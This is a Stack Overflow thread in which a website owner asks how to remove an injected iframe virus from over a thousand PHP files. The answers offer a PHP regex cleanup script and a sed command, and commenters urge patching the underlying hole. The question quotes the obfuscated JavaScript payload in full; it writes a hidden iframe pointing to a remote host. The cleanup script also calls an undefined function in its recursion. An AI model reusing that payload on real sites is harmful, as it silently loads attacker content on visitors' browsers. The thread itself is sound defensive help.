How can i remove an iframe virus from all of php files on my website

Question

I have a problem about removing a virus code from my php files. There are more than 1200 php files in my server and every single php file has been infected by a virus. Virus code adding this line to html output

here the virus code :

<tag5479347351></tag5479347351><script>eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" i=\\"0\\" g=\\"0\\" j=\\"0\\" f=\\"c://d.h.n.l/o.m\\">";1 5="<8";1 7="p";1 4="e";1 b="</8";1 a="e>";2.3(5);9(2.3(7+4+k+b),6);9(2.3(4+a),6);',26,26,'|var|document|write|k02|k0|1000|k01|if|setTimeout|k22|k2|http|125||src|height|230|width|board||248|php|58|tag1|ram'.split('|'),0,{}))</script><tag5479347352></tag5479347352>

Above code in every single php file. How can i remove this virus code from every php file ? Is there a quick way for doing it?

I don't know, our server directly down because ther is detected from trojan virus in that iframe code, then we removed that code then automatically that code showing again. help me please — Wilda Sagita, Oct 10 '15 at 03:00
@frosty - He's probably running an insecure PHP-based webserver ... and he got hacked. — Stephen C, Oct 10 '15 at 03:00
please give me simplicity understanding. maybe i must add one file php so my all php file can't be given virus code — Wilda Sagita, Oct 10 '15 at 03:02
I'm voting to close this question as off-topic because it belongs on the webmasters site. — Stephen C, Oct 10 '15 at 03:02
@StephenC Mostly likely a free server? Maybe a server like 000webhost. — frosty, Oct 10 '15 at 03:03
There is no simple solution to this. First thing you need to do is to fix the security problem in your site that lead to the infection. It might be that you haven't been patching / upgrading. It might be something specific in your PHP code. Once you've fixed the security hole(s), then you can try to clean out the virus code. But this is NOT the right place to ask for help. — Stephen C, Oct 10 '15 at 03:04
@frosty - It is unlikely to be at the server level. It is more likely that he is running an unpatched Drupal or Joomla site or something like that. Or that he has written some custom PHP that has created a security hole that someone has exploited. — Stephen C, Oct 10 '15 at 03:06
i saw there is right answer from http://stackoverflow.com/questions/2798745/how-can-i-remove-an-iframe-virus-from-all-of-php-files-on-my-website but i confused how can i change that code be with my virus code — Wilda Sagita, Oct 10 '15 at 03:08
Agree with @StevenC on this one. I marked question as "Needs editing". Can you confirm you've found how you got infected and patched any security issues? The way you phrased the question seems to imply that you'd like a text-processing solution to a security problem. That's like trying to hack a computer using a watermelon =) Folks contributing an answer to the question phrased as-is are encouraging poor sys/web admin practices. — drapkin11, Oct 10 '15 at 03:31

Pedro Lobito · Answer 1 · 2015-11-06T10:10:30.790

You can use:

removeVirus.php

<?php

foreach(rglob("*.php") as $virusFile){

    $withVirus = file_get_contents($virusFile);
    $withoutVirus = preg_replace('%<tag\d+>.*</tag\d+>%', '', $withVirus);
    file_put_contents($virusFile, $withoutVirus);
}

function rglob($pattern, $flags = 0){
// forked from https://github.com/rodurma/PHP-Functions/
    // blob/master/glob_recursive.php
  $files = glob($pattern, $flags);

  foreach (glob(dirname($pattern).'/*', 
    GLOB_ONLYDIR|GLOB_NOSORT) as $dir){
    $files = array_merge($files, glob_recursive
        ($dir.'/'.basename($pattern), $flags));
  }
  return $files;
}

Usage:

put removeVirus.php on the root of your website and execute from the shell as root (or as the owner of the files)

php removeVirus.php

Notes:

1 - I've tested the code on my server with 10 php files containing the virus and it worked as intended.

2 - Make sure you find the source of the hack and patch your system accordingly.

Andrew · Answer 2 · 2015-10-10T05:34:01.590

-2

If the "virus code" string literal you have provided is embedded in every php file, then it can be removed via command line. Open the shell application (Command Prompt for Windows or Terminal for UNIX/UNIX-based operating systems e.g. OS X, Linux, etc). You will need to escape the virus code before you pass it to the shell, however the ideal methods may vary dependent on your system. Execute the following commands:

cd /path/to/your/infected/php/files

sed -i 's/insert_escaped_virus_code_here//g' *

P.S. If see has not yet been installed, then follow these directions for OS X and Windows.

edited Oct 10 '15 at 05:34

answered Oct 10 '15 at 03:10

Andrew

1,322
14
20

She asking for a way to delete them simultaneously, as oppose to opening files one by one and deleting them manually. – frosty Oct 10 '15 at 03:12
Use regex; there's [another thread](http://stackoverflow.com/questions/102083/whats-the-best-tool-to-find-and-replace-regular-expressions-over-multiple-files) on that – Andrew Oct 10 '15 at 03:14
o.O isn't that in PERL? – frosty Oct 10 '15 at 03:16
There are multiple suggestions on that page, there is also an answer for how to do it via [command line](http://stackoverflow.com/a/102730/5410688) – Andrew Oct 10 '15 at 03:22
Literally the only suggestions are "use this", "use that", with the assumption that you already know exactly where to use it at, and the assumption that you already know how to use what they're suggesting to use. – frosty Oct 10 '15 at 03:28
**"then you can simply delete the code from all of your files"** there's nothing simple on editing 1200 files! I'm sorry but your answer is completely useless – Pedro Lobito Oct 10 '15 at 04:23
I drew more lines between the dots. I hope you can connect them now. – Andrew Oct 10 '15 at 05:37

How can i remove an iframe virus from all of php files on my website

2 Answers2

Linked